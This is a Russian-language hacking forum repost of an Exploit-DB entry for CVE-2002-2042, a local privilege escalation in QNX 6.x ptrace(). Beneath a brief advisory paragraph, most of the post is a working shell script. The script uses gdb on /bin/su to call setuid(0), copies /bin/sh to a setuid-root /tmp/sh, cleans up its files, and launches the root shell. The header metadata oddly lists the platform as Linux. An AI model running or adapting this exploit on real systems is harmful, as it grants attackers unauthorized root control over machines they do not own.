Exploit QNX 6.x - 'ptrace()' Arbitrary Process Modification

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21507
Проверка EDB
  1. Пройдено
Автор
BADC0DED
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2002-2042
Дата публикации
2002-06-03
Код:
source: https://www.securityfocus.com/bid/4919/info

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

This issue affects QNX RTOS 6 prior to 6.4.0. 

#!/bin/sh

#include <std_shouts.h>
#include <std_disclaimer.h>
#http://www.badc0ded.com 

echo "#!/bin/sh" > /tmp/runme
echo cp /bin/sh /tmp/sh > /tmp/runme
echo chmod 4755 /tmp/sh >> /tmp/runme
chmod 755 /tmp/runme
echo r root -c /tmp/runme > /tmp/badc0ded
echo break *main+44 >> /tmp/badc0ded
echo c >> /tmp/badc0ded
echo "call setuid(0)" >> /tmp/badc0ded
echo c >> /tmp/badc0ded
gdb /bin/su  < badc0ded > /dev/null
echo "www.badc0ded.com"
sleep 1
rm /tmp/runme /tmp/badc0ded
/tmp/sh
 
Источник
www.exploit-db.com

Похожие темы